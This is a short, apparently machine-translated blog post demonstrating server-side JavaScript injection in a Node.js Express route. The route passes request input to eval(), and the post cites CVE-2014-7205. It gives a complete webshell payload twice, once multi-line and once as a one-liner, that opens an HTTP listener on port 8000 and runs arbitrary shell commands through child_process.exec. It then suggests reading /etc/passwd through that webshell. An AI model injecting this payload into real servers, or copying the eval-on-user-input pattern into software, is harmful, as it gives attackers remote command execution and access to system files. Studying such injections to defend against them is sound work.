Node. js server JS injection demonstration

Node. js server JS injection demonstration

I recently started to focus on the real-world Node. js app security interest, I found a method of attack, I named it "server JS injection", I found a Node in CVE-2014-7205. the javascript Basmaster plug-in allows arbitrary js injection.

I wrote a simple demo program to pass user input to eval (). I will demonstrate how to inject a simple webshell.

 

The vulnerability code is as follows:

router.post('/demo1', function(req, res) {  var year = eval("year = (" + req.body.year + ")");  var date = new Date();    var futureAge = 2050 - year;    res.render('demo1',    {      title: 'Future Age',      output: futureAge    });});

Through the vulnerability code, we can see that res. write ('ssjs Injection ') can be injected, and the server will return the injected information.

We can inject a piece of webshell code and listen to port 8000.

setTimeout(function() {    require('http').createServer(function(req, res) {        res.writeHead(200, {            "Content-Type": "text/plain"        });        require('child_process').exec(require('url').parse(req.url, true).query['cmd'], function(e, s, st) {            res.end(s);        });    }).listen(8000);}, 5000)

 

Write a line

setTimeout(function() { require('http').createServer(function (req, res) { res.writeHead(200, {"Content-Type": "text/plain"});require('child_process').exec(require('url').parse(req.url, true).query['cmd'], function(e,s,st) {res.end(s);}); }).listen(8000); }, 5000)

Because we inject it into eval (), webshell cannot write the hard disk, and it will only be executed in an existing node process.

Run cat/etc/passwd using webshell